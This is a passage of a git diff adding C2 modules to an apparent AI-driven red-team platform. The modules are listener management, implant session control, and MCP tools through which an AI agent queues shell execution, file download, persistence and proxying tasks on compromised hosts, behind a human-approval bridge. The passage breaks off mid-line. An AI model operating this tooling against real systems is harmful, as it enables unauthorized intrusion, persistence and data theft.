"admin", database.RBACScopeAll, map[string]bool{"asset:read": true}) + ctx := authctx.WithPrincipal(context.Background(), principal) + server := mcp.NewServer(zap.NewNop()) + server.SetToolAuthorizer(mcpToolAuthorizer(db)) + registerAssetTools(server, db, zap.NewNop()) + + boundCtx := mcp.WithMCPConversationID(ctx, bound.ID) + result, _, err := server.CallTool(boundCtx, builtin.ToolQueryAssets, map[string]interface{}{}) + text := toolResultText(result) + if err != nil || result == nil || result.IsError || !strings.Contains(text, assets[0].ID) || strings.Contains(text, assets[1].ID) || strings.Contains(text, assets[2].ID) { + t.Fatalf("bound query escaped project scope: result=%#v text=%q err=%v", result, text, err) + } + + // Even an explicit foreign project_id cannot override the conversation boundary. + result, _, err = server.CallTool(boundCtx, builtin.ToolQueryAssets, map[string]interface{}{"project_id": projectB.ID}) + text = toolResultText(result) + if err != nil || result == nil || result.IsError || !strings.Contains(text, assets[0].ID) || strings.Contains(text, assets[1].ID) { + t.Fatalf("project_id overrode conversation scope: result=%#v text=%q err=%v", result, text, err) + } + + result, _, err = server.CallTool(boundCtx, builtin.ToolGetAsset, map[string]interface{}{"id": assets[1].ID}) + if err != nil || result == nil || !result.IsError { + t.Fatalf("bound get read a foreign-project asset: result=%#v err=%v", result, err) + } + + unboundCtx := mcp.WithMCPConversationID(ctx, unbound.ID) + result, _, err = server.CallTool(unboundCtx, builtin.ToolQueryAssets, map[string]interface{}{"page_size": 10}) + text = toolResultText(result) + if err != nil || result == nil || result.IsError || !strings.Contains(text, assets[0].ID) || !strings.Contains(text, assets[1].ID) || !strings.Contains(text, assets[2].ID) { + t.Fatalf("unbound query did not retain all-assets behavior: result=%#v text=%q err=%v", result, text, err) + } +} diff --git a/internal/app/c2_hitl_bridge.go b/internal/app/c2_hitl_bridge.go new file mode 100644 index 00000000..7477d5a5 --- /dev/null +++ b/internal/app/c2_hitl_bridge.go @@ -0,0 +1,228 @@ +package app + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "strings" + "time" + + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/database" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// C2HITLBridge 实现 C2 Manager 的 HITLBridge 接口,将危险任务桥接到现有 HITL 审批流。 +// 审批记录写入 hitl_interrupts 表,与现有 HITL 系统共享前端审批 UI。 +type C2HITLBridge struct { + db *database.DB + logger *zap.Logger + timeout time.Duration + getConvID func() string +} + +// NewC2HITLBridge 创建 C2 HITL 桥 +func NewC2HITLBridge(db *database.DB, logger *zap.Logger) *C2HITLBridge { + return &C2HITLBridge{ + db: db, + logger: logger, + timeout: 5 * time.Minute, + getConvID: func() string { return "" }, + } +} + +// SetConversationIDGetter 设置获取当前对话 ID 的函数 +func (b *C2HITLBridge) SetConversationIDGetter(fn func() string) { + b.getConvID = fn +} + +// SetTimeout 设置审批超时(0 表示不超时) +func (b *C2HITLBridge) SetTimeout(d time.Duration) { + b.timeout = d +} + +// RequestApproval 实现 HITLBridge 接口:写入 hitl_interrupts 表并轮询等待审批结果 +func (b *C2HITLBridge) RequestApproval(ctx context.Context, req c2.HITLApprovalRequest) error { + interruptID := "hitl_c2_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + now := time.Now() + + convID := req.ConversationID + if convID == "" { + convID = b.getConvID() + } + if convID == "" { + convID = "c2_system" + } + + payload, _ := json.Marshal(map[string]interface{}{ + "task_id": req.TaskID, + "session_id": req.SessionID, + "task_type": req.TaskType, + "payload": req.PayloadJSON, + "source": req.Source, + "reason": req.Reason, + "c2_operation": true, + }) + + _, err := b.db.Exec(`INSERT INTO hitl_interrupts + (id, conversation_id, message_id, mode, tool_name, tool_call_id, payload, status, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, 'pending', ?)`, + interruptID, convID, "", "approval", + c2.MCPToolC2Task, req.TaskID, + string(payload), now, + ) + if err != nil { + b.logger.Error("C2 HITL: 创建审批记录失败,拒绝执行", zap.Error(err)) + return fmt.Errorf("C2 HITL 审批记录创建失败,安全起见拒绝执行: %w", err) + } + + b.logger.Info("C2 HITL: 等待人工审批", + zap.String("interrupt_id", interruptID), + zap.String("task_id", req.TaskID), + zap.String("task_type", req.TaskType), + ) + + // Poll DB waiting for decision + ticker := time.NewTicker(500 * time.Millisecond) + defer ticker.Stop() + + var deadline <-chan time.Time + if b.timeout > 0 { + timer := time.NewTimer(b.timeout) + defer timer.Stop() + deadline = timer.C + } + + for { + select { + case <-ctx.Done(): + _, _ = b.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject', + decision_comment='context cancelled', decided_at=? WHERE id=? AND status='pending'`, + time.Now(), interruptID) + return ctx.Err() + + case <-deadline: + _, _ = b.db.Exec(`UPDATE hitl_interrupts SET status='timeout', decision='reject', + decision_comment='C2 HITL timeout auto-reject for safety', decided_at=? WHERE id=? AND status='pending'`, + time.Now(), interruptID) + b.logger.Warn("C2 HITL: 审批超时,安全起见拒绝执行", zap.String("interrupt_id", interruptID)) + return fmt.Errorf("C2 HITL 审批超时,危险任务已被自动拒绝") + + case <-ticker.C: + var status, decision string + err := b.db.QueryRow(`SELECT status, COALESCE(decision, '') FROM hitl_interrupts WHERE id = ?`, + interruptID).Scan(&status, &decision) + if err != nil { + if err == sql.ErrNoRows { + return nil + } + continue + } + switch status { + case "decided", "timeout": + if decision == "reject" { + return fmt.Errorf("C2 危险任务被人工拒绝") + } + return nil + case "cancelled": + return fmt.Errorf("C2 审批已取消") + case "pending": + continue + default: + continue + } + } + } +} + +// C2HooksConfig 配置 C2 Manager 的 Hooks +type C2HooksConfig struct { + DB *database.DB + Logger *zap.Logger + AttackChainRecord func(session *database.C2Session, phase string, description string) + VulnRecord func(session *database.C2Session, title string, severity string) +} + +// SetupC2Hooks 设置 C2 Manager 的业务钩子 +func SetupC2Hooks(cfg *C2HooksConfig) c2.Hooks { + return c2.Hooks{ + OnSessionFirstSeen: func(session *database.C2Session) { + // 新会话上线 + cfg.Logger.Info("C2 Session first seen", + zap.String("session_id", session.ID), + zap.String("hostname", session.Hostname), + zap.String("os", session.OS), + zap.String("arch", session.Arch), + ) + + // 记录漏洞(初始访问点) + if cfg.VulnRecord != nil { + cfg.VulnRecord(session, fmt.Sprintf("C2 Session Established: %s@%s", session.Username, session.Hostname), "high") + } + + // 记录攻击链(Initial Access) + if cfg.AttackChainRecord != nil { + cfg.AttackChainRecord(session, "initial-access", fmt.Sprintf("Implant beacon from %s/%s", session.Hostname, session.InternalIP)) + } + }, + OnTaskCompleted: func(task *database.C2Task, sessionID string) { + // 任务完成 + cfg.Logger.Debug("C2 Task completed", + zap.String("task_id", task.ID), + zap.String("task_type", task.TaskType), + zap.String("status", task.Status), + ) + + // 根据任务类型记录攻击链 + if cfg.AttackChainRecord != nil { + session, _ := cfg.DB.GetC2Session(sessionID) + if session != nil { + phase := taskToAttackPhase(task.TaskType) + if phase != "" { + cfg.AttackChainRecord(session, phase, fmt.Sprintf("Task %s: %s", task.TaskType, task.Status)) + } + } + } + }, + } +} + +// taskToAttackPhase 将任务类型映射到 ATT&CK 阶段 +func taskToAttackPhase(taskType string) string { + switch taskType { + case "exec", "shell": + return "execution" + case "upload": + return "persistence" + case "download": + return "exfiltration" + case "screenshot": + return "collection" + case "kill_proc": + return "impact" + case "port_fwd", "socks_start": + return "lateral-movement" + case "load_assembly": + return "defense-evasion" + case "persist": + return "persistence" + case "self_delete": + return "defense-evasion" + default: + return "execution" + } +} + +// SetupC2HITLBridgeWithAgent 设置 HITL 桥接器 +// 这个函数将由 App 调用,注入必要的依赖 +func SetupC2HITLBridgeWithAgent(db *database.DB, logger *zap.Logger) c2.HITLBridge { + return &C2HITLBridge{ + db: db, + logger: logger, + timeout: 5 * time.Minute, + getConvID: func() string { return "" }, + } +} diff --git a/internal/app/c2_lifecycle.go b/internal/app/c2_lifecycle.go new file mode 100644 index 00000000..af651c39 --- /dev/null +++ b/internal/app/c2_lifecycle.go @@ -0,0 +1,104 @@ +package app + +import ( + "context" + + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/handler" + + "go.uber.org/zap" +) + +// setupC2Runtime 创建 C2 Manager、看门狗与取消函数;不注册 MCP 工具(由 Apply 统一 ClearTools 后注册)。 +func setupC2Runtime( + cfg *config.Config, + db *database.DB, + agentHandler *handler.AgentHandler, + logger *zap.Logger, +) (*c2.Manager, *c2.SessionWatchdog, context.CancelFunc) { + if !cfg.C2.EnabledEffective() { + return nil, nil, nil + } + c2Manager := c2.NewManager(db, logger, "tmp/c2") + c2Manager.Registry().Register(string(c2.ListenerTypeTCPReverse), c2.NewTCPReverseListener) + c2Manager.Registry().Register(string(c2.ListenerTypeHTTPBeacon), c2.NewHTTPBeaconListener) + c2Manager.Registry().Register(string(c2.ListenerTypeHTTPSBeacon), c2.NewHTTPSBeaconListener) + c2Manager.Registry().Register(string(c2.ListenerTypeWebSocket), c2.NewWebSocketListener) + c2HITLBridge := NewC2HITLBridge(db, logger) + c2Manager.SetHITLBridge(c2HITLBridge) + c2Manager.SetHITLDangerousGate(func(conversationID, toolName string) bool { + return agentHandler.HITLNeedsToolApproval(conversationID, toolName) + }) + c2Hooks := SetupC2Hooks(&C2HooksConfig{ + DB: db, + Logger: logger, + AttackChainRecord: func(session *database.C2Session, phase string, description string) { + logger.Info("C2 Attack Chain", + zap.String("session_id", session.ID), + zap.String("phase", phase), + zap.String("desc", description), + ) + }, + VulnRecord: func(session *database.C2Session, title string, severity string) { + logger.Info("C2 Vulnerability", + zap.String("session_id", session.ID), + zap.String("title", title), + zap.String("severity", severity), + ) + }, + }) + c2Manager.SetHooks(c2Hooks) + c2Manager.RestoreRunningListeners() + c2Watchdog := c2.NewSessionWatchdog(c2Manager) + watchdogCtx, watchdogCancel := context.WithCancel(context.Background()) + go c2Watchdog.Run(watchdogCtx) + return c2Manager, c2Watchdog, watchdogCancel +} + +// ReconcileC2AfterConfigApply 根据当前内存配置启停 C2(不写盘;在 Apply 中 ClearTools 之前调用)。 +func (a *App) ReconcileC2AfterConfigApply() error { + if !a.config.C2.EnabledEffective() { + a.shutdownC2() + return nil + } + if a.c2Manager != nil { + return nil + } + if a.db == nil || a.agentHandler == nil { + return nil + } + m, wd, cancel := setupC2Runtime(a.config, a.db, a.agentHandler, a.logger.Logger) + if m == nil { + return nil + } + a.c2Manager = m + a.c2Watchdog = wd + a.c2WatchdogCancel = cancel + if a.c2Handler != nil { + a.c2Handler.SetManager(m) + } + a.logger.Info("C2 子系统已按配置启动") + return nil +} + +// shutdownC2 停止看门狗与所有监听器,并断开 Handler 引用。 +func (a *App) shutdownC2() { + had := a.c2WatchdogCancel != nil || a.c2Manager != nil + if a.c2WatchdogCancel != nil { + a.c2WatchdogCancel() + a.c2WatchdogCancel = nil + } + a.c2Watchdog = nil + if a.c2Manager != nil { + a.c2Manager.Close() + a.c2Manager = nil + } + if a.c2Handler != nil { + a.c2Handler.SetManager(nil) + } + if had { + a.logger.Info("C2 子系统已关闭") + } +} diff --git a/internal/app/c2_tools.go b/internal/app/c2_tools.go new file mode 100644 index 00000000..6cca39a3 --- /dev/null +++ b/internal/app/c2_tools.go @@ -0,0 +1,919 @@ +package app + +import ( + "context" + "encoding/json" + "fmt" + "path/filepath" + "strconv" + "strings" + "time" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/authctx" + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// registerC2Tools 注册所有 C2 MCP 工具(合并同类项,减少工具数量以节省上下文 token)。 +// webListenPort 为本进程 Web/API 监听端口(配置 server.port,启动时已加载),用于 MCP 描述中提示勿与 C2 bind_port 冲突。 +func registerC2Tools(mcpServer *mcp.Server, c2Manager *c2.Manager, logger *zap.Logger, webListenPort int) { + registerC2ListenerTool(mcpServer, c2Manager, logger, webListenPort) + registerC2SessionTool(mcpServer, c2Manager, logger) + registerC2TaskTool(mcpServer, c2Manager, logger) + registerC2TaskManageTool(mcpServer, c2Manager, logger) + registerC2PayloadTool(mcpServer, c2Manager, logger, webListenPort) + registerC2EventTool(mcpServer, c2Manager, logger) + registerC2ProfileTool(mcpServer, c2Manager, logger) + registerC2FileTool(mcpServer, c2Manager, logger) + logger.Debug("C2 MCP tools registered (8 unified tools)") +} + +func makeC2Result(data interface{}, err error) (*mcp.ToolResult, error) { + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: err.Error()}}, + IsError: true, + }, nil + } + text, _ := json.Marshal(data) + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: string(text)}}, + }, nil +} + +// ============================================================================ +// c2_listener — 监听器统一工具 +// ============================================================================ + +func registerC2ListenerTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListenPort int) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Listener, + Description: fmt.Sprintf(`C2 监听器管理。通过 action 参数选择操作: +- list: 列出所有监听器 +- get: 获取监听器详情(需 listener_id) +- create: 创建监听器(需 name, type, bind_port)。成功时除 listener 外会返回 implant_token(仅此一次,用于 X-Implant-Token / oneliner;list/get/start 不再返回) +- update: 更新监听器配置(需 listener_id,可改 name/bind_host/bind_port/remark/config/callback_host) +- start: 启动监听器(需 listener_id) +- stop: 停止监听器(需 listener_id) +- delete: 删除监听器(需 listener_id) +监听器类型: tcp_reverse, http_beacon, https_beacon, websocket +tcp_reverse 默认仅接受 CSB1 加密 Beacon(AES-GCM + ImplantToken)才登记会话;经典 bash/nc 反弹需在 config.allow_legacy_shell=true(公网不推荐)。 +端口约束:create/update 的 bind_port 禁止与本平台 Web/API 所用端口相同。当前本服务该端口为 %d(配置项 server.port,随进程启动从配置文件加载)。若 bind_port 与此相同会导致本服务或监听器 bind 失败、Beacon/oneliner 误连到 Web 而非 C2。请为监听器另选空闲端口。`, webListenPort), + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: list/get/create/update/start/stop/delete", "enum": []string{"list", "get", "create", "update", "start", "stop", "delete"}}, + "listener_id": map[string]interface{}{"type": "string", "description": "监听器 ID(get/update/start/stop/delete 需要)"}, + "name": map[string]interface{}{"type": "string", "description": "监听器名称(create/update)"}, + "type": map[string]interface{}{"type": "string", "description": "监听器类型(create)", "enum": []string{"tcp_reverse", "http_beacon", "https_beacon", "websocket"}}, + "bind_host": map[string]interface{}{"type": "string", "description": "绑定地址,默认 127.0.0.1;外网监听常用 0.0.0.0"}, + "callback_host": map[string]interface{}{"type": "string", "description": "可选:植入端/Payload 回连主机名(公网 IP 或域名)。写入 config_json;生成 oneliner/beacon 时优先于 bind_host。update 时传入空字符串可清除"}, + "bind_port": map[string]interface{}{"type": "integer", "description": fmt.Sprintf("绑定端口(create 必填)。须 ≠ %d(当前本服务 Web/API 端口,配置 server.port)", webListenPort), "minimum": 1, "maximum": 65535}, + "project_id": map[string]interface{}{"type": "string", "description": "所属项目 ID。create 省略时默认使用当前对话绑定项目;未绑定项目的对话则创建未绑定监听器"}, + "profile_id": map[string]interface{}{"type": "string", "description": "Malleable Profile ID"}, + "remark": map[string]interface{}{"type": "string", "description": "备注"}, + "config": map[string]interface{}{"type": "object", "description": "高级配置(beacon 路径/TLS/OPSEC 等),create/update 可用。tcp_reverse 可选 allow_legacy_shell:true 允许未加密经典 shell(默认 false)"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + id := getString(params, "listener_id") + + switch action { + case "list": + listeners, err := m.DB().ListC2ListenersForAccess(c2ToolAccess(ctx), mcpEffectiveProjectFilter(ctx, m.DB())) + if err != nil { + return makeC2Result(nil, err) + } + for _, li := range listeners { + li.EncryptionKey = "" + li.ImplantToken = "" + } + return makeC2Result(map[string]interface{}{"listeners": listeners, "count": len(listeners)}, nil) + + case "get": + listener, err := m.DB().GetC2Listener(id) + if err != nil { + return makeC2Result(nil, err) + } + if listener == nil { + return makeC2Result(nil, fmt.Errorf("listener not found")) + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + return makeC2Result(map[string]interface{}{"listener": listener}, nil) + + case "create": + var cfg *c2.ListenerConfig + if cfgRaw, ok := params["config"]; ok && cfgRaw != nil { + cfgBytes, _ := json.Marshal(cfgRaw) + cfg = &c2.ListenerConfig{} + _ = json.Unmarshal(cfgBytes, cfg) + } + projectID := strings.TrimSpace(getString(params, "project_id")) + if projectID == "" { + projectID = mcpEffectiveProjectFilter(ctx, m.DB()) + if projectID == database.ProjectFilterUnbound { + projectID = "" + } + } + input := c2.CreateListenerInput{ + Name: getString(params, "name"), + Type: getString(params, "type"), + BindHost: getString(params, "bind_host"), + BindPort: int(getFloat64(params, "bind_port")), + ProfileID: getString(params, "profile_id"), + Remark: getString(params, "remark"), + ProjectID: projectID, + Config: cfg, + CallbackHost: getString(params, "callback_host"), + } + listener, err := m.CreateListener(input) + if err != nil { + return makeC2Result(nil, err) + } + if principal, ok := authctx.PrincipalFromContext(ctx); ok { + _ = m.DB().SetResourceOwner("c2_listener", listener.ID, principal.UserID) + _ = m.DB().AssignResourceToUser(principal.UserID, "c2_listener", listener.ID) + } + implantToken := listener.ImplantToken + listener.EncryptionKey = "" + listener.ImplantToken = "" + return makeC2Result(map[string]interface{}{ + "listener": listener, + "implant_token": implantToken, + }, nil) + + case "update": + listener, err := m.DB().GetC2Listener(id) + if err != nil { + return makeC2Result(nil, err) + } + if listener == nil { + return makeC2Result(nil, fmt.Errorf("listener not found")) + } + if m.IsListenerRunning(id) { + newHost := getString(params, "bind_host") + newPort := int(getFloat64(params, "bind_port")) + if (newHost != "" && newHost != listener.BindHost) || (newPort > 0 && newPort != listener.BindPort) { + return makeC2Result(nil, fmt.Errorf("cannot modify bind address while listener is running")) + } + } + if v := getString(params, "name"); v != "" { + listener.Name = v + } + if v := getString(params, "bind_host"); v != "" { + listener.BindHost = v + } + if v := int(getFloat64(params, "bind_port")); v > 0 { + listener.BindPort = v + } + if v := getString(params, "profile_id"); v != "" { + listener.ProfileID = v + } + if v, ok := params["remark"]; ok { + listener.Remark, _ = v.(string) + } + if cfgRaw, ok := params["config"]; ok && cfgRaw != nil { + cfgBytes, _ := json.Marshal(cfgRaw) + listener.ConfigJSON = string(cfgBytes) + } + if _, ok := params["callback_host"]; ok { + pcfg := &c2.ListenerConfig{} + raw := strings.TrimSpace(listener.ConfigJSON) + if raw == "" { + raw = "{}" + } + _ = json.Unmarshal([]byte(raw), pcfg) + pcfg.CallbackHost = strings.TrimSpace(getString(params, "callback_host")) + pcfg.ApplyDefaults() + cfgBytes, err := json.Marshal(pcfg) + if err != nil { + return makeC2Result(nil, err) + } + listener.ConfigJSON = string(cfgBytes) + } + if err := m.DB().UpdateC2Listener(listener); err != nil { + return makeC2Result(nil, err) + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + return makeC2Result(map[string]interface{}{"listener": listener}, nil) + + case "start": + listener, err := m.StartListener(id) + if err != nil { + return makeC2Result(nil, err) + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + return makeC2Result(map[string]interface{}{"listener": listener}, nil) + + case "stop": + err := m.StopListener(id) + return makeC2Result(map[string]interface{}{"stopped": err == nil}, err) + + case "delete": + err := m.DeleteListener(id) + return makeC2Result(map[string]interface{}{"deleted": err == nil}, err) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_session — 会话统一工具 +// ============================================================================ + +func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Session, + Description: `C2 会话管理。通过 action 参数选择操作: +- list: 列出会话(可按 listener_id/status/os/search/suspicious 过滤) +- get: 获取会话详情及最近任务历史(需 session_id) +- set_sleep: 设置心跳间隔(需 session_id) +- kill: 下发 exit 任务让 implant 退出(需 session_id) +- delete: 删除单个会话记录(需 session_id) +- delete_batch: 批量删除会话(需 session_ids 数组)`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: list/get/set_sleep/kill/delete/delete_batch", "enum": []string{"list", "get", "set_sleep", "kill", "delete", "delete_batch"}}, + "session_id": map[string]interface{}{"type": "string", "description": "会话 ID(get/set_sleep/kill/delete 需要)"}, + "session_ids": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "会话 ID 列表(delete_batch)"}, + "listener_id": map[string]interface{}{"type": "string", "description": "按监听器过滤(list)"}, + "status": map[string]interface{}{"type": "string", "description": "按状态过滤: active/sleeping/dead/killed(list)"}, + "os": map[string]interface{}{"type": "string", "description": "按 OS 过滤: linux/windows/darwin(list)"}, + "search": map[string]interface{}{"type": "string", "description": "模糊搜索 hostname/username/IP(list)"}, + "suspicious": map[string]interface{}{"type": "boolean", "description": "仅疑似误报:离线且 tcp_* / unknown / PID 0(list)"}, + "limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list)"}, + "sleep_seconds": map[string]interface{}{"type": "integer", "description": "心跳间隔秒数(set_sleep)"}, + "jitter_percent": map[string]interface{}{"type": "integer", "description": "抖动百分比 0-100(set_sleep)"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + id := getString(params, "session_id") + + switch action { + case "list": + filter := database.ListC2SessionsFilter{ + ListenerID: getString(params, "listener_id"), + ProjectID: mcpEffectiveProjectFilter(ctx, m.DB()), + Status: getString(params, "status"), + OS: getString(params, "os"), + Search: getString(params, "search"), + } + if limit := int(getFloat64(params, "limit")); limit > 0 { + filter.Limit = limit + } + if v, ok := params["suspicious"].(bool); ok && v { + filter.Suspicious = true + } + sessions, err := m.DB().ListC2SessionsForAccess(filter, c2ToolAccess(ctx)) + return makeC2Result(map[string]interface{}{"sessions": sessions, "count": len(sessions)}, err) + + case "get": + session, err := m.DB().GetC2Session(id) + if err != nil { + return makeC2Result(nil, err) + } + if session == nil { + return makeC2Result(nil, fmt.Errorf("session not found")) + } + tasks, _ := m.DB().ListC2Tasks(database.ListC2TasksFilter{SessionID: id, Limit: 10}) + return makeC2Result(map[string]interface{}{"session": session, "tasks": tasks}, nil) + + case "set_sleep": + sleep := int(getFloat64(params, "sleep_seconds")) + jitter := int(getFloat64(params, "jitter_percent")) + task, err := m.SetSessionSleep(id, sleep, jitter) + out := map[string]interface{}{ + "updated": err == nil, + "sleep_seconds": sleep, + "jitter_percent": jitter, + } + if task != nil { + out["task_id"] = task.ID + } + return makeC2Result(out, err) + + case "kill": + task, err := m.EnqueueTask(c2.EnqueueTaskInput{ + SessionID: id, + TaskType: c2.TaskTypeExit, + Payload: map[string]interface{}{}, + Source: "ai", + ConversationID: agent.ConversationIDFromContext(ctx), + UserCtx: ctx, + }) + return makeC2Result(map[string]interface{}{"task": task}, err) + + case "delete": + err := m.DB().DeleteC2Session(id) + return makeC2Result(map[string]interface{}{"deleted": err == nil}, err) + + case "delete_batch": + rawIDs, _ := params["session_ids"].([]interface{}) + ids := make([]string, 0, len(rawIDs)) + for _, v := range rawIDs { + if s, ok := v.(string); ok && strings.TrimSpace(s) != "" { + ids = append(ids, strings.TrimSpace(s)) + } + } + n, err := m.DB().DeleteC2SessionsByIDs(ids) + return makeC2Result(map[string]interface{}{"deleted": n}, err) + + default: + return makeC2Result(nil, fmt.Errorf("unknown action: %s", action)) + } + }) +} + +// ============================================================================ +// c2_task — 任务下发统一工具(合并所有 task 类型) +// ============================================================================ + +func registerC2TaskTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2Task, + Description: `在 C2 会话上下发任务。所有任务类型通过 task_type 参数指定: +- exec: 执行命令(需 command) +- shell: 交互式命令,保持 cwd(需 command) +- pwd/ps/screenshot/socks_stop: 无额外参数 +- cd/ls: 需 path +- kill_proc: 需 pid +- upload: 需 remote_path + file_id +- download: 需 remote_path +- port_fwd: 需 action(start/stop) + local_port + remote_host + remote_port +- socks_start: 需 port(默认 1080) +- load_assembly: 需 data(base64) 或 file_id,可选 args +- persist: 可选 method(auto/cron/bashrc/launchagent/registry/schtasks) +返回 task_id,用 c2_task_manage 的 wait/get_result 获取结果。`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "session_id": map[string]interface{}{"type": "string", "description": "C2 会话 ID(s_xxx)"}, + "task_type": map[string]interface{}{"type": "string", "description": "任务类型", "enum": []string{"exec", "shell", "pwd", "cd", "ls", "ps", "kill_proc", "upload", "download", "screenshot", "port_fwd", "socks_start", "socks_stop", "load_assembly", "persist"}}, + "command": map[string]interface{}{"type": "string", "description": "命令(exec/shell)"}, + "path": map[string]interface{}{"type": "string", "description": "路径(cd/ls)"}, + "pid": map[string]interface{}{"type": "integer", "description": "进程 ID(kill_proc)"}, + "remote_path": map[string]interface{}{"type": "string", "description": "远程路径(upload/download)"}, + "file_id": map[string]interface{}{"type": "string", "description": "服务端文件 ID(upload/load_assembly)"}, + "data": map[string]interface{}{"type": "string", "description": "base64 数据(load_assembly)"}, + "args": map[string]interface{}{"type": "string", "description": "命令行参数(load_assembly)"}, + "action": map[string]interface{}{"type": "string", "description": "start/stop(port_fwd)"}, + "local_port": map[string]interface{}{"type": "integer", "description": "本地端口(port_fwd)"}, + "remote_host": map[string]interface{}{"type": "string", "description": "远程主机(port_fwd)"}, + "remote_port": map[string]interface{}{"type": "integer", "description": "远程端口(port_fwd)"}, + "port": map[string]interface{}{"type": "integer", "description": "SOCKS5 端口(socks_start),默认 1080"}, + "method": map[string]interface{}{"type": "string", "description": "持久化方法(persist): auto/cron/bashrc/launchagent/registry/schtasks"}, + "timeout_seconds": map[string]interface{}{"type": "integer", "description": "超时秒数,默认 60"}, + }, + "required": []string{"session_id", "task_type"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + sessionID := getString(params, "session_id") + taskTypeStr := getString(params, "task_type") + taskType := c2.TaskType(taskTypeStr) + timeout := getFloat64(params, "timeout_seconds") + + payload := map[string]interface{}{"timeout_seconds": timeout} + + switch taskType { + case c2.TaskTypeExec, c2.TaskTypeShell: + payload["command"] = getString(params, "command") + case c2.TaskTypeCd, c2.TaskTypeLs: + payload["path"] = getString(params, "path") + case c2.TaskTypeKillProc: + payload["pid"] = params["pid"] + case c2.TaskTypeUpload: + payload["remote_path"] = getString(params, "remote_path") + payload["file_id"] = getString(params, "file_id") + case c2.TaskTypeDownload: + payload["remote_path"] = getString(params, "remote_path") + case c2.TaskTypePortFwd: + payload["action"] = getString(params, "action") + payload["local_port"] = params["local_port"] + payload["remote_host"] = getString(params, "remote_host") + payload["remote_port"] = params["remote_port"] + case c2.TaskTypeSocksStart: + payload["port"] = params["port"] + case c2.TaskTypeLoadAssembly: + payload["data"] = getString(params, "data") + payload["file_id"] = getString(params, "file_id") + payload["args"] = getString(params, "args") + case c2.TaskTypePersist: + payload["method"] = getString(params, "method") + case c2.TaskTypePwd, c2.TaskTypePs, c2.TaskTypeScreenshot, c2.TaskTypeSocksStop: + // no extra params + default: + return makeC2Result(nil, fmt.Errorf("unsupported task_type: %s", taskTypeStr)) + } + + input := c2.EnqueueTaskInput{ + SessionID: sessionID, + TaskType: taskType, + Payload: payload, + Source: "ai", + ConversationID: agent.ConversationIDFromContext(ctx), + UserCtx: ctx, + } + task, err := m.EnqueueTask(input) + if err != nil { + return makeC2Result(nil, err) + } + return makeC2Result(map[string]interface{}{"task_id": task.ID, "status": task.Status}, nil) + }) +} + +// ============================================================================ +// c2_task_manage — 任务管理工具(查询/等待/取消) +// ============================================================================ + +func registerC2TaskManageTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) { + s.RegisterTool(mcp.Tool{ + Name: builtin.ToolC2TaskManage, + Description: `C2 任务管理。通过 action 参数选择操作: +- get_result: 获取任务详情和结果(需 task_id) +- wait: 阻塞等待任务完成并返回结果(需 task_id) +- list: 列出任务(可按 session_id/status 过滤) +- cancel: 取消排队中的任务(需 task_id)`, + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "action": map[string]interface{}{"type": "string", "description": "操作: get_result/wait/list/cancel", "enum": []string{"get_result", "wait", "list", "cancel"}}, + "task_id": map[string]interface{}{"type": "string", "description": "任务 ID(get_result/wait/cancel 需要)"}, + "session_id": map[string]interface{}{"type": "string", "description": "按会话过滤(list)"}, + "status": map[string]interface{}{"type": "string", "description": "按状态过滤: queued/sent/running/success/failed/cancelled(list)"}, + "limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list)"}, + "timeout_seconds": map[string]interface{}{"type": "integer", "description": "等待超时秒数(wait),默认 60"}, + }, + "required": []string{"action"}, + }, + }, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) { + action := getString(params, "action") + + switch action { + case "get_result": + id := getString(params, "task_id") + task, err := m.DB().GetC2Task(id) + if err != nil { + return makeC2Result(nil, err) + } + if task == nil { + return makeC2Result(nil, fmt.Errorf("task not found")) + } + return makeC2Result(map[string]interface{}{"task": task}, nil) + + case "wait": + id := getString(params, "task_id") + timeout := int(getFloat64(params, "timeout_seconds")) + if timeout <= 0 { + timeout = 60 + } + deadline := time.Now().Add(time.Duration(timeout) * time.Second) + for time.Now().Before(deadline) { + task, err := m.DB().GetC2Task(id) + if err != nil { + return makeC2Result(nil, err) + } + if task == nil { + return makeC2Result(nil, fmt.Errorf("task not found")) + } + if task.Status == "success" || task.Status == "failed" || 